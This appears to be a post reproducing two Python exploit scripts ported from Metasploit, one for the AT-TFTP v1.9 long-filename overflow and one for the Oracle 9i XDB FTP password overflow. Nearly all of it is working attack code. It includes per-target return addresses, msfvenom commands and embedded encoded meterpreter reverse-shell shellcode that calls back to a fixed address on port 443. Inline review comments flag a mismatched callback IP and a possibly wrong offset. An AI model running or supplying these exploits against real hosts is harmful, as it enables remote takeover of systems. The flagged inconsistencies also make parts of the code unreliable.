
Two exploit scripts extracted from Metasploit: a stack buffer overflow in AT-TFTP v1.9 (overly long file name in a write request) and the Oracle 9i XDB FTP password buffer overflow. Both carry a pre-generated meterpreter payload whose callback address is fixed at msfvenom time, so regenerate the shellcode before use.
+ Exploits a stack buffer overflow in AT-TFTP v1.9, by sending a request (get/write) for an overly long file name.
Extracted from Metasploit.
TODO: adjust -pick the right return address for the appropriate target
Usage: python attftp_long_filename.py <IP Address> <Port> <Your IP Address> (the original text named the Oracle script here by mistake; this usage line belongs to the AT-TFTP script below)
+ Exploits Oracle 9i XDB ftp password buffer overflow vulnerability.
TODO: adjust
– rhost to point to the right target
– rport to use the right port
Execution: python oracle_xdb_ftp_pass-exploit.py
attftp_long_filename.py Script:
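#!/usr/bin/env python3
## attftp_long_filename.py
##
## Exploits a stack buffer overflow in AT-TFTP v1.9, by sending a write request
## (TFTP opcode 2, the "\x00\x02" prefix below) for an overly long file name.
## Extracted from Metasploit.
##
## Spawns a reverse meterpreter shell. NOTE: the callback address/port are baked
## into the encoded payload (SHELLCODE) at msfvenom time -- they are NOT taken
## from the command line. The <Your IP Address> argument only sizes the NOP sled
## (see build_exploit). Regenerate SHELLCODE to change LHOST/LPORT.
##
## Author Re4son <re4son [at] whitedome.com.au>
##
## Usage: python3 attftp_long_filename.py <IP Address> <Port> <Your IP Address> [target name]
##   target name is one of the TARGETS keys below (default: "Windows Server 2003").

import socket
import struct
import sys

## Return addresses according to metasploit (target name -> address):
TARGETS = {
    "Windows NT SP4 English":    0x702ea6f7,
    "Windows 2000 SP0 English":  0x750362c3,
    "Windows 2000 SP1 English":  0x75031d85,
    "Windows 2000 SP2 English":  0x7503431b,
    "Windows 2000 SP3 English":  0x74fe1c5a,
    "Windows 2000 SP4 English":  0x75031dce,
    "Windows XP SP0/1 English":  0x71ab7bfb,
    "Windows XP SP2 English":    0x71ab9372,
    "Windows XP SP3 English":    0x7e429353,   # ret by c0re
    "Windows Server 2003":       0x7c86fed3,   # ret donated by securityxxxpert
    "Windows Server 2003 SP2":   0x7c86a01b,   # ret donated by Polar Bear
}
DEFAULT_TARGET = "Windows Server 2003"

## Max space for shell code = 210
## Bad characters according to metasploit: \x00
## Payload via:
##
## Generate payload: msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=192.168.193.17 LPORT=443 -a x86 --platform Windows -f raw -o payload
##
## Prepend a stack adjust of -3500 to the payload before encoding:
## Obtain stack adjust of -3500 (0xdac as per printf '%x\n' 3500) with /usr/share/metasploit-framework/tools/nasm_shell.rb:
##   nasm > sub esp, 0xdac
##   00000000 81ECAC0D0000 sub esp,0xdac
## add opcodes to a file: perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
##
## Combine stackadj & payload: cat stackadj payload > shellcode
## hexdump -C shellcode
## 00000000 81 ec ac 0d 00 00 fc 6a eb 47 e8 f9 ff ff ff 60 |.......j.G.....`|
## 00000010 31 db 8b 7d 3c 8b 7c 3d 78 01 ef 8b 57 20 01 ea |1..}<.|=x...W ..|
## 00000020 8b 34 9a 01 ee 31 c0 99 ac c1 ca 0d 01 c2 84 c0 |.4...1..........|
## 00000030 75 f6 43 66 39 ca 75 e3 4b 8b 4f 24 01 e9 66 8b |u.Cf9.u.K.O$..f.|
## 00000040 1c 59 8b 4f 1c 01 e9 03 2c 99 89 6c 24 1c 61 ff |.Y.O....,..l$.a.|
## 00000050 e0 31 db 64 8b 43 30 8b 40 0c 8b 70 1c ad 8b 68 |.1.d.C0.@..p...h|
## 00000060 08 5e 66 53 66 68 33 32 68 77 73 32 5f 54 66 b9 |.^fSfh32hws2_Tf.|
## 00000070 72 60 ff d6 95 53 53 53 53 43 53 43 53 89 e7 66 |r`...SSSSCSCS..f|
## 00000080 81 ef 08 02 57 53 66 b9 e7 df ff d6 66 b9 a8 6f |....WSf.....f..o|
## 00000090 ff d6 97 68 c0 a8 0c c5 66 68 01 bb 66 53 89 e3 |...h....fh..fS..|
## 000000a0 6a 10 53 57 66 b9 57 05 ff d6 50 b4 0c 50 53 57 |j.SWf.W...P..PSW|
## 000000b0 53 66 b9 c0 38 ff e6 |Sf..8..|
## 000000b7
##
## NOTE(review): the immediate at 0x93 in this dump (`68 c0 a8 0c c5`) decodes
## as 192.168.12.197, not the 192.168.193.17 named in the msfvenom line (which
## would be c0 a8 c1 11); the port word `01 bb` is 443. If this dump is what was
## encoded into SHELLCODE, the callback goes to 192.168.12.197 -- regenerate.
##
## Encode shellcode: cat shellcode | msfvenom -p - -b \x00 -a x86 --platform Windows -e x86/shikata_ga_nai -f python
## x86/shikata_ga_nai succeeded with size 210 (iteration=0)
SHELLCODE = (
    b"\xba\xb9\x89\xf7\x9a\xdb\xd4\xd9\x74\x24\xf4\x5b\x29"
    b"\xc9\xb1\x2e\x83\xeb\xfc\x31\x53\x11\x03\x53\x11\xe2"
    b"\x4c\x08\x1b\x36\xa3\x0b\xe4\xbb\xd1\xe0\xa3\xab\xdc"
    b"\x08\xd4\xd3\x7e\xc6\xf0\xa7\x03\x14\x8c\xc4\xc6\x1c"
    b"\x93\xdb\xb3\x8a\xb3\x22\x29\xbf\x80\xbe\xac\x2e\xd9"
    b"\x7e\x37\x02\xdb\xb5\x4a\x5a\x1e\xcd\x94\x29\x68\x8d"
    b"\x72\xeb\x5e\x67\x99\x40\xd4\xc7\x79\x56\x03\xb1\x0a"
    b"\x44\x8a\xb5\x43\x69\x2d\x23\x58\xbd\xb4\x3a\x32\x99"
    b"\xda\x5d\x35\x01\xd3\x46\xad\x49\x57\x49\xa6\x0e\x54"
    b"\x22\xc8\x92\xc9\xbf\x40\xa3\x4f\xa6\xc3\xd5\x07\x15"
    b"\xd1\x71\xaf\x2a\x27\xdd\x1b\xab\xfe\x93\xc3\xcc\xd6"
    b"\xc1\x57\x60\x85\xba\x14\xd5\x6a\x6e\x12\x3e\x0a\x11"
    b"\xcb\xc9\xd0\x46\x47\xac\x6d\x8f\xb8\xcf\x5b\x36\xfe"
    b"\x98\x0c\x48\xd6\x4e\xba\x76\x7f\x7c\xff\x11\xe8\x7c"
    b"\x44\xbb\xbb\xf7\x59\x2e\x2c\x5b\xca\xc9\xf5\x0c\xf1"
    b"\xea\xd0\xe3\x4d\x18\x8d\x50\xfa\x72\x4b\xee\xc4\x4d"
    b"\x6c\xf6"
)

## tail from metasploit
TAIL = (
    b"\x83\xc4\x28\xc3"     # <-- esp = add esp 0x28 + retn
    b"\x00netascii\x00"     # Finish as expected by the AT TFTP server
)


def build_exploit(lhost, target=DEFAULT_TARGET):
    """Return the TFTP write-request datagram that triggers the overflow.

    Layout: opcode 2 + NOP sled + 210-byte encoded payload + return address
    (little endian) + stack-adjust/retn stub + "\\x00netascii\\x00".

    lhost:  attacker IP string. It is only used to size the sled
            (25 - len(lhost) bytes); it is never placed in the packet and
            does not change where the payload connects back to.
    target: key of TARGETS selecting the return address.
    Raises KeyError for an unknown target name.
    """
    ret = struct.pack("<I", TARGETS[target])    # Return address (Little Endian)
    ## NOTE(review): the sled is sized as 25 - len(lhost) but lhost itself is never
    ## appended, so the offset of `ret` from the packet start shrinks by len(lhost)
    ## bytes with each longer address. Presumably the Metasploit original puts LHOST
    ## after the sled to keep the prefix at a fixed 25 bytes -- verify the ret offset
    ## against the module before relying on it. Behaviour kept as-is here.
    nops = b"\x90" * (25 - len(lhost))
    return b"\x00\x02" + nops + SHELLCODE + ret + TAIL


def main(argv=None):
    """Parse <IP> <port> <your IP> [target name], send one datagram, return an exit code."""
    argv = sys.argv[1:] if argv is None else argv
    if len(argv) not in (3, 4):
        print("Usage: python3 attftp_long_filename.py <IP Address> <Port> <Your IP Address> [target name]")
        print("Targets: " + ", ".join(TARGETS))
        return 2
    rhost = argv[0]          # Target IP address as command line argument
    rport = int(argv[1])     # Target Port as command line argument
    lhost = argv[2]          # Attackers IP address (sled sizing only, see build_exploit)
    target = argv[3] if len(argv) == 4 else DEFAULT_TARGET
    if target not in TARGETS:
        print("Unknown target '" + target + "'; choose one of: " + ", ".join(TARGETS))
        return 2

    exploit = build_exploit(lhost, target)
    try:
        # UDP: there is no connect, so a failure here is a local/send error,
        # not proof that the target is unreachable.
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            print("\nDelivering package...")
            s.sendto(exploit, (rhost, rport))
            print("\nPackage delivered!")
    except OSError as exc:
        print("\nCould not send to " + rhost + ":" + str(rport) + "! (" + str(exc) + ")")
        return 1
    return 0


if __name__ == "__main__":
    sys.exit(main())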
oracle_xdb_ftp_pass-exploit.py Script:
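#!/usr/bin/env python3
## oracle_xdb_ftp_pass-exploit.py
##
## Exploits Oracle 9i XDB ftp password buffer overflow vulnerability
## -> http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf
##
## Spawns a reverse meterpreter shell to 192.168.192.14:443. The callback
## address/port are baked into ENCODED at msfvenom time -- regenerate it to
## change them.
##
## Author Re4son <re4son [at] whitedome.com.au>
##
## TODO: adjust
## - rhost to point to the right target
## - rport to use the right port
##
## Execution: python3 oracle_xdb_ftp_pass-exploit.py

import random
import socket
import string
import struct
import sys

rhost = "192.168.104.13"  # Target IP address
rport = 2100              # Target Port of the XDB FTP listener this script talks to.
                          # (The earlier "can be 135, 137, 445" note looked copy-pasted
                          # from an SMB exploit and does not apply to an FTP service;
                          # verify the listener port on the target.)

## Return addresses according to metasploit:
##
## 0x60616d46 oraclient9.dll (pop/pop/ret)
RET = struct.pack("<I", 0x60616d46)  ## Return address (Little Endian): b"\x46\x6d\x61\x60"

## Max space for shell code = 800
## Bad characters according to metasploit: \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40
## Shellcode via: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.192.14 LPORT=443 EXITFUNC=thread -a x86 --platform Windows -b \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40 -f python -v shellcode
## x86/call4_dword_xor succeeded with size 308 (iteration=0)
ENCODED = (
    b"\x29\xc9\x83\xe9\xb9\xe8\xff\xff\xff\xff\xc0\x5e"
    b"\x81\x76\x0e\x8e\x9d\x91\xba\x83\xee\xfc\xe2\xf4"
    b"\x72\x75\x13\xba\x8e\x9d\xf1\x33\x6b\xac\x51\xde"
    b"\x05\xcd\xa1\x31\xdc\x91\x1a\xe8\x9a\x16\xe3\x92"
    b"\x81\x2a\xdb\x9c\xbf\x62\x3d\x86\xef\xe1\x93\x96"
    b"\xae\x5c\x5e\xb7\x8f\x5a\x73\x48\xdc\xca\x1a\xe8"
    b"\x9e\x16\xdb\x86\x05\xd1\x80\xc2\x6d\xd5\x90\x6b"
    b"\xdf\x16\xc8\x9a\x8f\x4e\x1a\xf3\x96\x7e\xab\xf3"
    b"\x05\xa9\x1a\xbb\x58\xac\x6e\x16\x4f\x52\x9c\xbb"
    b"\x49\xa5\x71\xcf\x78\x9e\xec\x42\xb5\xe0\xb5\xcf"
    b"\x6a\xc5\x1a\xe2\xaa\x9c\x42\xdc\x05\x91\xda\x31"
    b"\xd6\x81\x90\x69\x05\x99\x1a\xbb\x5e\x14\xd5\x9e"
    b"\xaa\xc6\xca\xdb\xd7\xc7\xc0\x45\x6e\xc2\xce\xe0"
    b"\x05\x8f\x7a\x37\xd3\xf5\xa2\x88\x8e\x9d\xf9\xcd"
    b"\xfd\xaf\xce\xee\xe6\xd1\xe6\x9c\x89\x62\x44\x02"
    b"\x1e\x9c\x91\xba\xa7\x59\xc5\xea\xe6\xb4\x11\xd1"
    b"\x8e\x62\x44\xea\xde\xcd\xc1\xfa\xde\xdd\xc1\xd2"
    b"\x64\x92\x4e\x5a\x71\x48\x06\xd0\x8b\xf5\x51\x12"
    b"\x82\x58\xf9\xb8\x8e\x9c\x2a\x33\x68\xf7\x81\xec"
    b"\xd9\xf5\x08\x1f\xfa\xfc\x6e\x6f\x0b\x5d\xe5\xb6"
    b"\x71\xd3\x99\xcf\x62\xf5\x61\x0f\x2c\xcb\x6e\x6f"
    b"\xe4\x9d\xfb\xbe\xd8\xca\xf9\xb8\x57\x55\xce\x45"
    b"\x5b\x16\xa7\xd0\xce\xf5\x91\xaa\x8e\x9d\xc7\xd0"
    b"\x8e\xf5\xc9\x1e\xdd\x78\x6e\x6f\x1d\xce\xfb\xba"
    b"\xd8\xce\xc6\xd2\x8c\x44\x59\xe5\x71\x48\x90\x79"
    b"\xa7\x5b\xe4\x54\x4d\x9d\x91\xba"
)

## Goes after the NOP sled, but before the decoder machine code.
PREPEND_ENCODER = b"\x81\xc4\xff\xef\xff\xff\x44"

## NOP sled sized so that sled + prepend + encoded payload fills exactly 800 bytes
## (800 - 7 - 308 = 485 with the payload above). Computed from the actual lengths
## so a regenerated payload cannot silently shift the layout.
SHELLCODE_SPACE = 800
NOPS = b"\x90" * (SHELLCODE_SPACE - len(PREPEND_ENCODER) - len(ENCODED))
SHELLCODE = NOPS + PREPEND_ENCODER + ENCODED

PASSWD_FILLER_LEN = 442      ## bytes of filler before the SEH overwrite
JMP_SHORT = b"\xEB\x06"      ## Short jump (\xEB) to an offset of 6 (\x06) according to metasploit (Rex::Arch::X86.jmp_short(6)):
                             ## skips the two NOPs and the 4-byte handler address that follow it.
TWO_NOPS = b"\x90\x90"       ## Two NOP's


def random_upper(length):
    """Return `length` random uppercase ASCII letters as bytes.

    This is protocol filler, not a secret, so the `random` module is adequate.
    """
    return "".join(random.choice(string.ascii_uppercase) for _ in range(length)).encode("ascii")


def build_password(passwd=None):
    """Build the overlong PASS argument that overwrites the SEH record.

    Layout: 442 filler bytes + jmp_short + two NOPs + pop/pop/ret address
    + 800-byte shellcode (NOP sled, prepend, encoded payload).

    passwd: optional 442 filler bytes (defaults to random uppercase letters);
            exposed so the layout can be checked deterministically.
    """
    if passwd is None:
        passwd = random_upper(PASSWD_FILLER_LEN)
    return passwd + JMP_SHORT + TWO_NOPS + RET + SHELLCODE


def main():
    """Connect to rhost:rport, send USER then the overflowing PASS; return an exit code."""
    user = random_upper(10)             ## 10 random uppercase characters
    buffer = build_password()
    try:
        print("\nConnecting...")
        # Timeout so a silent listener cannot hang the script forever on recv().
        with socket.create_connection((rhost, rport), timeout=10) as s:
            s.recv(1024)                                  # banner
            # The original sent 'USER' with no space before the name, which is a
            # malformed FTP command; "USER <name>" is what the PASS line mirrors.
            s.sendall(b"USER " + user + b"\r\n")
            s.recv(1024)
            s.sendall(b"PASS " + buffer + b"\r\n")
            print("\nDone!")
    except OSError as exc:
        print("Could not connect to " + rhost + ":" + str(rport) + "! (" + str(exc) + ")")
        return 1
    return 0


if __name__ == "__main__":
    sys.exit(main())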
Source: https://github.com/Re4son